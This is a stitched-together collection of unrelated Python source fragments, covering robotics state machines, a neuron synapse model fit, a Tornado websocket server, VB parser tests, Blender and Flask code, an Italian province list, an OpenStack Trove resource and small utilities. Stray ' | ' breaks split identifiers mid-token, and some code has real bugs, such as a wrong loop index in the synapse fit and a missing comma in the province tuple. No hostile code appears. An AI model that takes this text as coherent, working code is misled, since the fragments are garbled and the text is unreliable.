transitions={'done': 'opengrip'},
autonomy={'done': Autonomy.Off})
# x:506 y:86
OperatableStateMachine.add('opengrip',
SetGripperState(width=0.1, effort=0),
transitions={'object': 'finished', 'no_object': 'finished'},
autonomy={'object': Autonomy.Off, 'no_object': Autonomy.Off},
remapping={'object_size': 'object_size'})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
|
import numpy as np
import matplotlib.pyplot as plt
from math import exp
size = 9
dt = 50.0 # ms
dt_2 = 550.0
# Vectors to fit
x_fit = np.zeros(size)
V_max_fit = np.zeros(size)
V0_fit = np.zeros(size)
# Paramters of the model
tau_rec = 1000.0 # ms
tau_mem = 32.0 # ms
tau_in = 1.8 # ms
A = 144.0
u = 0.26
# First we will fit x
x_fit[0] = 1
for i in range(size - 2):
x_fit[i+1] = x_fit[i] * (1 - u) * exp(-dt / tau_rec)
+ 1 - exp(-dt / tau_rec)
# Last value of x_fit
x_fit[-1] = x_fit[-2] * (1 - u) * exp(-dt_2 / tau_rec)
+ 1 - exp(-dt_2 / tau_rec)
# We calculate alpha fit
alpha_fit = u * A * x_fit
# Now we calculate V_0 and V_max
V0_fit[0] = 0
tau_diff = tau_in - tau_mem
for k in range(size - 1):
ex1 = exp(-dt / tau_in)
ex2 = exp(-dt / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
print 'problem', problem
this = alpha_fit[k] * tau_in / tau_diff
print 'this', this
that = V0_fit[k] * exp(-dt / tau_mem)
print 'that', that
V0_fit[k + 1] = that + this * problem
for k in range(size - 1):
aux2 = ( | alpha_fit[k] * tau_in - V0_fit[k] * tau_diff)
#print 'aux', aux2
aux = alpha_fit[i] * tau_mem / aux2
V_max_fit[k] = alpha_fit[k] * (aux ** (tau_mem / tau_diff))
# The final values
ex1 = np.exp(-dt_2 / tau_in)
ex2 = np.exp(-dt_2 / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
problem = ex1 - ex2
this = alpha_fit[-2] * tau_in / tau_diff
that = V0_fit[-2] * exp(-dt_2 / tau_mem)
V0_fit[-1] = that + this * problem
aux = alpha_fit[-1] * tau_mem / (alpha_fit[-1]
| * tau_in - V0_fit[-1] * tau_diff)
V_max_fit[-1] = alpha_fit[-1] * (aux ** (tau_mem / tau_diff))
amp_fit = V_max_fit - V0_fit
# Finally we plot
plt.subplot(1, 2, 1)
plt.plot(x_fit, '*-', label='x_fit')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(V_max_fit, '*-', label='Vmax_fit')
plt.hold(True)
plt.plot(V0_fit, '*-', label='V0_fit')
plt.legend()
plt.show()
|
try:
from tornado.websocket import WebSocketHandler
import tornado.ioloop
tornadoAvailable = True
except ImportError:
class WebSocketHandler(object): pass
tornadoAvailable = False
from json import loads as fromJS, dumps as toJS
from threading import Thread
from Log import console
import Settings
from utils import *
PORT = Settings.PORT + 1
handlers = []
channels = {}
class WebSocket:
@staticmethod
def available():
return tornadoAvailable
@staticmethod
def start():
if WebSocket.available():
WSThread().start()
@staticmethod
def broadcast(data):
for handler in handlers:
handler.write_message(toJS(data))
@staticmethod
def sendChannel(channel, data):
if not 'channel' in data:
data['channel'] = channel
for handler in channels.get(channel, []):
handler.write_message(toJS(data))
class WSThread(Thread):
def __init__(self):
Thread.__init__(self)
self.name = 'websocket'
self.daemon = True
def run(self):
app = tornado.web.Application([('/', WSHandler)])
app.listen(PORT, '0.0.0.0')
tornado.ioloop.IOLoop.instance().start()
class WSHandler(WebSocketHandler):
def __init__(self, *args, **kw):
super(WSHandler, self).__init__(*args, **kw)
self.channels = set()
def check_origin(self, origin):
return True
def open(self):
handlers.append(self)
console('websocket', "Opened")
def on_message(self, message):
console('websocket', "Message received: %s" % message)
try:
data = fromJS(message)
except:
return
if 'subscribe' in data and isinstance(data['subscribe'], list):
addChannels = (set(data['subscribe']) - self.channels)
self.channels |= addChannels
for channel in addChannels:
if channel not in channels:
channels[channel] = set()
channels[channel].add(self)
if 'unsubscribe' in data and isinstance(data['unsubscribe'], list):
rmChannels = (self.channels & set(data['unsubscribe']))
self.channels -= rmChannels
for channel in rmChannels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
def on_close(self):
for channel in self.channels:
channels[c | hannel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
handlers.remove(self)
console('websocket', "Closed")
verbs = {
'status': "Status set",
'name': "Renamed",
'goal': "Goal set",
'assigned': "Reassigned",
'hours': "Hours updated",
}
from Event import EventHandler, addEventHandler
class ShareTaskChanges(EventHandler):
def newTask(self, handler, task):
WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'new'}); #TODO
def ta | skUpdate(self, handler, task, field, value):
if field == 'assigned': # Convert set of Users to list of usernames
value = [user.username for user in value]
elif field == 'goal': # Convert Goal to goal ID
value = value.id if value else 0
description = ("%s by %s" % (verbs[field], task.creator)) if field in verbs else None
WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'update', 'id': task.id, 'revision': task.revision, 'field': field, 'value': value, 'description': description, 'creator': task.creator.username})
addEventHandler(ShareTaskChanges())
|
0 Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont 5, 10, 15",
"If a = 10 Then Exit Function",
"If a = 10 Then Exit Function Else DoIt",
"If a = 10 Then Exit Function Else DoIt=1",
"If a = 10 Then Exit Function Else DoIt 1, 2, 3",
"If a = 10 Then DoIt Else Exit Function",
"If a = 10 Then DoIt=1 Else Exit Function",
"If a = 10 Then DoIt 1,2,34 Else Exit Function",
])
# Weird inline if followed by assignment that failed once
tests.extend([
"If a = 10 Then b a\nc=1",
])
# << Parsing tests >> (35 of 61)
# #If
tests.append("""
#If a = 10 Then
b = 20
#Else
c=2
#End If
#If c < 1 Then
d = 15
#Else
c=2
#End If
""")
# Empty #If
tests.append("""
#If a = 10 Then
#Else
c=2
#End If
""")
# Empty #If with comments
tests.append("""
#If a = 10 Then ' comment here
#Else
c=2
#End If
""")
# Simple #If with And/Or
tests.append("""
#If a = 10 And k = "test" Then
b = 20
#Else
c=2
#End If
#If c < 1 Or d Then
d = 15
#Else
c=2
#End If
""")
# Simple #If with compount And/Or expression
tests.append("""
#If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
#Else
c=2
#End If
#If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
#Else
c=2
#End If
""")
# #If Not
tests.append("""
#If Not a = 10 Then
b=2
#Else
c=2
#End If
""")
# << Parsing tests >> (36 of 61)
# simple sub
tests.append("""
Sub MySub()
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub()
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.extend(["""
Private Sub MySub()
a=10
n=20
c="hello"
End Sub""",
"""
Public Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Friend Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Private Static Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
])
# simple sub with gap in ()
tests.append("""
Sub MySub( )
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (37 of 61)
# simple sub
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (38 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x As Single, y, z As Object, a, b As MyThing.Object, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y As Variant, z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (39 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and defaults
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c="hello")
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and defaults
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c As String = "hello")
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (40 of 61)
# ByVal, ByRef args
tests.append("""
Sub MySub(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(ByVal a, y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(ByVal a As Single, y)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (41 of 61)
# 852166 Sub X<spc>(a,b,c) fails to parse
tests.append("""
Sub MySub (ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
# 880612 Continuation character inside call
tests.append("""
Sub MySub _
(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (42 of 61)
# simple fn
tests.append("""
Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""")
# simple fn with exit
tests.append("""
Function MyFn()
a=10
n=20
MyFn = 20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.extend(["""
Private Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function""",
"""
Public Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""",
"""
Friend Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""",
])
# simple fn with gap in ()
tests.append("""
Function MyFn( )
a=10
n=20
c="hello"
MyFn = 20
End Function
""")
# << Parsing tests >> (43 of 61)
# simple sub
tests.append("""
Function MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
Public Function fn(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (44 of 61)
# simple sub
tests.append("""
Function fn(x As Single, y, z As Boolean, a, b As Variant, c) As Single
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function fc(x As Single, y, z As Object, a, b As My | Thing.Object, c) As Object.Obj
a=10
n=20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, y As Variant, z, a As Boolena, b, c As Long) As Variant
a=10
n=20
c="hello"
End Function
Public Function MySub(x, y, z, a, b, c) As String
a=10
n=20
c="hello | "
End Function
""")
# function returning an array
tests.append("""
Function fn(x As Single, y, z As Boolean, a, b As Variant, c) As Single()
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (45 of 61)
# simple sub
tests.append("""
Function fn(x As Single, y, z As Boolean, a, Optional b As Variant, c) As Single
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c) As Integer
a=10
n=20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long) As Long
a=10
n=20
c="hello"
End Function
Public Function MySub(x, y, z, a, b, c) As Control.Buttons.BigButtons.ThisOne
a=10
n=20
c="hello"
End Function
""")
# simple fn with optional arguments and defaults
tests.append("""
Function MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c="hello")
a=10
n=20
c="hello"
End Function
""")
# simple fn with optional arguments and defaults
tests.append("""
Function MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c As String = "hello")
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (46 of 61)
# ByVal, ByRef args
tests.append("""
Function MySub(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(a, ByRef y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(ByVal a, y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(ByVal a As Single, y)
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (47 of 61)
# Simple property let/get/set
tests.extend(["""
Property Let MyProp(NewVal As String)
a = NewVal
Exit Property
End Property
""",
"""
Property Get MyProp() As Long
MyProp = NewVal
Exit Property
End Property
""",
"""
Property Set MyProp(NewObject As Object)
Set MyProp = NewVal
Exit Property
End Property
"""
"""
Public Property Let MyProp(NewVal As String)
a = NewVal
End Property
""",
"""
Public Property Ge |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import mathutils
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import (matrixdef, Matrix_listing, Vector_generate)
class MatrixGenNode(bpy.types.Node, SverchCustomTreeNode):
''' MatrixGenerator '''
bl_idname = 'MatrixGenNode'
bl_label = 'Matrix in'
bl_icon = 'OUTLINER_OB_EMPTY'
def sv_init(self, context):
s = self.inputs.new('VerticesSocket', "Location")
s.use_prop = True
s = self.inputs.new('VerticesSocket', "Scale")
s.use_prop = True
s.prop = (1, 1 , 1)
s = self.inputs.new('VerticesSocket', "Rotation")
s.use_prop = True
s.prop = (0, 0, 1)
self.inputs.new('StringsSocket', "Angle")
self.outputs.new('MatrixSocket', "Matrix")
def process(self):
L,S,R,A = self.inputs
Ma = self.outputs[0]
if not Ma.is_linked:
return
loc = Vector_generate(L.sv_get())
scale = Vector_generate(S.sv_get())
rot = Vector_generate(R.sv_get())
rotA, angle = [[]], [[0.0]]
# ability to add vector & vector difference instead of only rotation values
if A.is_linked:
if A.links[0].from_socket.bl_idname == 'VerticesSocket':
rotA = Vector_generate(A.sv_get())
angle = [[]]
else:
angle = A.sv_get()
rotA = [[]]
max_l = max(len(loc[0]), len(scale[0]), len(rot[0]), len(angle[0]), len(rotA[0]))
orig = []
for l in range(max_l):
M = mathutils.Matrix()
orig.append(M)
matrixes_ = matrixdef(orig | , loc, scale, r | ot, angle, rotA)
matrixes = Matrix_listing(matrixes_)
Ma.sv_set(matrixes)
def register():
bpy.utils.register_class(MatrixGenNode)
def unregister():
bpy.utils.unregister_class(MatrixGenNode)
if __name__ == '__main__':
register()
|
import html
import inflect
import titlecase
from flask import url_for
from shared.pd_exception import DoesNotExistException
from .. import APP, importing
from ..data import match
from ..view impo | rt View
@APP.route('/match/<int:match_id>/')
def show_match(match_id: int) -> str:
view = Match(match.get_match(match_id))
return view.page()
# pylint | : disable=no-self-use,too-many-instance-attributes
class Match(View):
def __init__(self, viewed_match: match.Match) -> None:
super().__init__()
if not viewed_match:
raise DoesNotExistException()
self.match = viewed_match
self.id = viewed_match.id
self.comment = viewed_match.comment
self.format_name = viewed_match.format_name()
self.players_string = ' vs '.join([p.name for p in viewed_match.players])
self.players_string_safe = ' vs '.join([player_link(p.name) for p in viewed_match.players])
self.module_string = ', '.join([m.name for m in viewed_match.modules])
if not viewed_match.games:
self.no_games = True
return
self.game_one = viewed_match.games[0]
self.has_game_two = False
self.has_game_three = False
if len(viewed_match.games) > 1:
self.has_game_two = True
self.game_two = viewed_match.games[1]
if len(viewed_match.games) > 2:
self.has_game_three = True
self.game_three = viewed_match.games[2]
if viewed_match.has_unexpected_third_game is None:
importing.reimport(viewed_match)
self.has_unexpected_third_game = viewed_match.has_unexpected_third_game
if viewed_match.is_tournament is None:
importing.reimport(viewed_match)
self.is_tournament = viewed_match.is_tournament
def og_title(self) -> str:
return self.players_string
def og_url(self) -> str:
return url_for('show_match', match_id=self.id, _external=True)
def og_description(self) -> str:
p = inflect.engine()
fmt = titlecase.titlecase(p.a(self.format_name))
description = '{fmt} match.'.format(fmt=fmt)
return description
def player_link(name: str) -> str:
url = url_for('show_person', person=name)
return '<a href="{url}">{name}</a>'.format(url=html.escape(url), name=html.escape(name))
|
# -*- coding: utf-8 -*
PROVINCE_CHOICES = (
('AG', 'Agrigento'),
('AL', 'Alessandria'),
('AN', 'Ancona'),
('AO', 'Aosta'),
('AR', 'Arezzo'),
('AP', 'Ascoli Piceno'),
('AT', 'Asti'),
('AV', 'Avellino'),
('BA', 'Bari'),
# ('BT', 'Barletta-Andria-Trani'), # active starting from 2009
('BL', 'Belluno'),
('BN', 'Benevento'),
('BG', 'Bergamo'),
('BI', 'Biella'),
('BO', 'Bologna'),
('BZ', 'Bolzano/Bozen'),
('BS', 'Brescia'),
('BR', 'Brindisi'),
('CA', 'Cagliari'),
('CL', 'Caltanissetta'),
('CB', 'Campobasso'),
('CI', 'Carbonia-Iglesias'),
('CE', 'Caserta'),
('CT', 'Catania'),
('CZ', 'Catanzaro'),
('CH', 'Chieti'),
('CO', 'Como'),
('CS', 'Cosenza'),
('CR', 'Cremona'),
('KR', 'Crotone'),
('CN', 'Cuneo'),
('EN', 'Enna'),
# ('FM', 'Fermo'), # active starting from 2009
('FE', 'Ferrara'),
('FI', 'Firenze'),
('FG', 'Foggia'),
('FC', 'Forlì-Cesena'),
('FR', 'Frosinone'),
('GE', 'Genova'),
('GO', 'Gorizia'),
('GR', 'Grosseto'),
('IM', 'Imperia'),
('IS', 'Isernia'),
('SP', 'La Spezia'),
('AQ', u'L’Acquila'),
('LT', 'Latina'),
('LE', 'Lecce'),
('LC', 'Lecco'),
('LI', 'Livorno'),
('LO', 'Lodi'),
('LU', 'Lucca'),
('MC', 'Macerata'),
('MN', 'Mantova'),
('MS', 'Massa-Carrara'),
('MT', 'Matera'),
('VS', 'Medio Campidano'),
('ME', 'Messina'),
('MI', 'Milano'),
('MO', 'Modena'),
| # ('MB', 'Monza e Brianza'), # active starting | from 2009
('NA', 'Napoli'),
('NO', 'Novara'),
('NU', 'Nuoro'),
('OG', 'Ogliastra'),
('OT', 'Olbia-Tempio'),
('OR', 'Oristano'),
('PD', 'Padova'),
('PA', 'Palermo'),
('PR', 'Parma'),
('PV', 'Pavia'),
('PG', 'Perugia'),
('PU', 'Pesaro e Urbino'),
('PE', 'Pescara'),
('PC', 'Piacenza'),
('PI', 'Pisa'),
('PT', 'Pistoia'),
('PN', 'Pordenone'),
('PZ', 'Potenza'),
('PO', 'Prato'),
('RG', 'Ragusa'),
('RA', 'Ravenna'),
('RC', 'Reggio Calabria'),
('RE', 'Reggio Emilia'),
('RI', 'Rieti'),
('RN', 'Rimini')
('RM', 'Roma'),
('RO', 'Rovigo'),
('SA', 'Salerno'),
('SS', 'Sassari'),
('SV', 'Savona'),
('SI', 'Siena'),
('SR', 'Siracusa'),
('SO', 'Sondrio'),
('TA', 'Taranto'),
('TE', 'Teramo'),
('TR', 'Terni'),
('TO', 'Torino'),
('TP', 'Trapani'),
('TN', 'Trento'),
('TV', 'Treviso'),
('TS', 'Trieste'),
('UD', 'Udine'),
('VA', 'Varese'),
('VE', 'Venezia'),
('VB', 'Verbano Cusio Ossola'),
('VC', 'Vercelli'),
('VR', 'Verona'),
('VV', 'Vibo Valentia'),
('VI', 'Vicenza'),
('VT', 'Viterbo'),
)
|
)
]
def __init__(self, name, json_snippet, stack):
super(Instance, self).__init__(name, json_snippet, stack)
self._href = None
self._dbinstance = None
@property
def dbinstance(self):
"""Get the trove dbinstance."""
if not self._dbinstance and self.resource_id:
self._dbinstance = self.client().instances.get(self.resource_id)
return self._dbinstance
def _dbinstance_name(self):
name = self.properties[self.NAME]
if name:
return name
return self.physical_resource_name()
def handle_create(self):
"""Create cloud database instance."""
self.flavor = self.properties[self.FLAVOR]
self.volume = {'size': self.properties[self.SIZE]}
self.databases = self.properties[self.DATABASES]
self.users = self.properties[self.USERS]
restore_point = self.properties[self.RESTORE_POINT]
if restore_point:
restore_point = {"backupRef": restore_point}
zone = self.properties[self.AVAILABILITY_ZONE]
self.datastore_type = self.properties[self.DATASTORE_TYPE]
self.datastore_version = self.properties[self.DATASTORE_VERSION]
replica_of = self.properties[self.REPLICA_OF]
replica_count = self.properties[self.REPLICA_COUNT]
# convert user databases to format required for troveclient.
# that is, list of database dictionaries
for user in self.users:
dbs = [{'name': db} for db in user.get(self.USER_DATABASES, [])]
user[self.USER_DATABASES] = dbs
# convert networks to format required by troveclient
nics = []
for nic in self.properties[self.NICS]:
nic_dict = {}
net = nic.get(self.NET)
port = nic.get(self.PORT)
if net or port:
neutron = self.client_plugin('neutron')
if net:
net_id = neutron.find_resourceid_by_name_or_id(
neutron.RES_TYPE_NETWORK,
net)
nic_dict['net-id'] = net_id
if port:
port_id = neutron.find_resourceid_by_name_or_id(
neutron.RES_TYPE_PORT,
port)
nic_dict['port-id'] = port_id
ip = nic.get(self.V4_FIXED_IP)
if ip:
nic_dict['v4-fixed-ip'] = ip
nics.append(nic_dict)
# create DB instance
instance = self.client().instances.create(
self._dbinstance_name(),
self.flavor,
volume=self.volume,
databases=self.databases,
users=self.users,
restorePoint=restore_point,
availability_zone=zone,
datastore=self.datastore_type,
datastore_version=self.datastore_version,
nics=nics,
replica_of=replica_of,
replica_count=replica_count)
self.resource_id_set(instance.id)
return instance.id
def _refresh_instance(self, instance_id):
try:
instance = self.client().instances.get(instance_id)
return instance
except Exception as exc:
if self.client_plugin().is_over_limit(exc):
LOG.warning("Stack %(name)s (%(id)s) received an "
"OverLimit response during instance.get():"
" %(exception)s",
{'name': self.stack.name,
'id': self.stack.id,
'exception': exc})
return None
else:
raise
def check_create_complete(self, instance_id):
"""Check if cloud DB instance creation is complete."""
instance = self._refresh_instance(instance_id) # refresh attributes
if instance is None:
return False
if instance.status in self.BAD_STATUSES:
raise exception.ResourceInError(
resource_status=instance.status,
status_reason=self.TROVE_STATUS_REASON.get(instance.status,
_("Unknown")))
if instance.status != self.ACTIVE:
return False
LOG.info("Database instance %(database)s created "
"(flavor:%(flavor)s, volume:%(volume)s, "
"datastore:%(datastore_type)s, "
"datastore_version:%(datastore_version)s)",
{'database': self._dbinstance_name(),
'flavor': self.flavor,
'volume': self.volume,
'datastore_type': self.datastore_type,
'datastore_version': self.datastore_version})
return True
def handle_check(self):
instance = self.client().instances.get(self.resource_id)
status = instance.status
checks = [
{'attr': 'status', 'expected': self.ACTIVE, 'current': status},
]
self._verify_check_conditions(checks)
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
updates = {}
if prop_diff:
instance = self.client().instances.get(self.resource_id)
if self.NAME in prop_diff:
updates.update({self.NAME: prop_diff[self.NAME]})
if self.FLAVOR in prop_diff:
flv = prop_diff[self.FLAVOR]
updates.update({self.FLAVOR: flv})
if self.SIZE in prop_diff:
updates.update({self.SIZE: prop_diff[self.SIZE]})
if self.DATABASES in prop_diff:
current = [d.name
for d in self.client().databases.list(instance)]
desired = [d[self.DATABASE_NAME]
for d in prop_diff[self.DATABASES]]
for db in prop_diff[self.DATABASES]:
dbname = db[self.DATABASE_NAME]
if dbname not in current:
db['ACTION'] = self.CREATE
for dbname in current:
if dbname not in desired:
deleted = {self.DATABASE_NAME: dbname,
'ACTION': self.DELETE}
prop_diff[self.DATABASES].append(deleted)
updates.update({self.DATABASES: prop_diff[self.DATABASES]})
if self.USERS in prop_diff:
current = [u.name
for u in self.client().users.list(instance)]
desired = [u[self.USER_NAME] for u in prop_diff[self.USERS]]
for usr in prop_diff[self.USERS]:
if usr[self.USER_NAME] not in current:
usr['ACTION'] = self.CREATE
for usr in current:
if usr not in desired:
prop_diff[self.USERS].append({self.USER_NAME: usr,
'ACTION': self.DELETE})
updates.update({self.USERS: prop_diff[self.USERS]})
return updates
def check_update_complete(self, updates):
instance = self.client().instances.get(self.resource_id)
if instance.status in self.BAD_STATUSES:
raise exception.ResourceInError(
resource_status=instance.sta | tus,
status_reason=self.TROVE_STATUS_REASON.get(instance.status,
_("Unknown")))
if updates:
if instance.status != self.ACTIVE:
dmsg = ("Instance is in status %(now)s. Waiting on status"
| " %(stat)s")
LOG.debug(dmsg % {"now": instance.status,
"stat": self.ACTIVE})
return False
try:
return (
self._update_name(instance, updates.get(self.NAME)) and
self._update_flavor(instance, updates.get(self.FLAVOR)) and
self._update_size(instance, updates.get(self.SIZE)) and
self._update_database |
#!/usr/bin/python
import re
import csv
import os
import json
def read_csv(fn):
results = {}
with open(fn, 'rb') as csvfile:
rows = csv.reader(csvfile, delimiter=',')
for row in rows:
m = re.search('Total Transactions', row[1])
if len(row) == 7 and m:
temp = results.get(row[0])
if not temp:
results[row[0]] = {row[1]: float(row[2]), row[3]: float(row[4])}
else:
| results[row[0]] = {row[1]: float( | row[2]) + temp.get(row[1]),
row[3]: float(row[4]) + temp.get(row[3])}
results[row[0]]['Throughput'] = results[row[0]][row[1]] / results[row[0]][row[3]]
return results
def traverse_all_csvs(path_to_dir):
files = []
for (dirpath, dirnames, filenames) in os.walk(path_to_dir):
for fn in filenames:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
if m:
files.append(fn)
break
return files
if __name__ == '__main__':
results = {}
files = traverse_all_csvs(os.path.dirname(os.path.realpath(__file__)))
for fn in files:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
results[m.group(1)] = read_csv(fn)
print json.dumps(results, indent=4, separators=(',', ': '))
with open('compilation.json', 'w') as outfile:
json.dump(results, outfile, sort_keys=True, indent=4, separators=(',', ': '))
rows = [['Type', 'Total Transactions', 'Time used', 'Throughput']]
for key, value in results.iteritems():
rows.append([key, '-', '-', '-'])
for k1, v1 in value.iteritems():
rows.append([k1, v1['Total Transactions'], v1['Time used'], v1['Throughput']])
with open('compilation.csv', 'wb') as f:
writer = csv.writer(f)
writer.writerows(rows)
|
# Copyright (C) 2017,2019, Yu Sheng Lin, johnjohnlys@media.ee.ntu.edu.tw
# This file is part of Nicotb.
# Nicotb is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Nicotb is distributed in the hope tha | t it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Nicotb. If not, see <http://www.gnu.org/licenses/>.
from nicotb.common import *
from collections import deque
event_released = set()
waiting_coro = list()
event_queue = deque()
def CreateEvent(hier: str | = ""):
if event_released:
n = event_released.pop()
else:
n = len(waiting_coro)
waiting_coro.append(list())
if COSIM and hier:
BindEvent(n, (TOP_PREFIX+hier).encode())
return n
def CreateEvents(descs: list):
return [CreateEvent(event) for event in descs]
def GetEvent(ev):
return ev if isinstance(ev, int) else CreateEvent(ev)
def SignalEvent(ev, all_ev=True):
event_queue.append((ev, all_ev))
def DestroyEvent(ev: int):
# Do not destroy events created with hier name
waiting_coro[ev] = list()
event_released.add(ev)
# Initialize a default event, so coroutines can implement SystemC-like dont_initialize
INIT_EVENT = CreateEvent()
SignalEvent(INIT_EVENT)
|
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010 by Joel Andersson, Moritz Diehl, K.U.Leuven. All rights reserved.
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# -*- coding: utf-8 -*-
import os
import sys
from numpy import *
import numpy as NP
import matplotlib.pyplot as plt
import zipfile
# JModelica
from jmodelica.jmi import compile_jmu
from jmodelica.jmi import JMUModel
import jmodelica
# CasADi
from casadi import *
curr_dir = os.path.dirname(os.path.abspath(__file__));
try:
# Try the old Jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_xml':False})
except jmodelica.compiler.UnknownOptionError:
# Try the new jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_me_xml':False})
if True:
vdp = JMUModel(jmu_name)
res = vdp.optimize()
# Extract variable profiles
x1=res['x1']
x2=res['x2']
u=res['u']
t=res['time']
cost=res['cost']
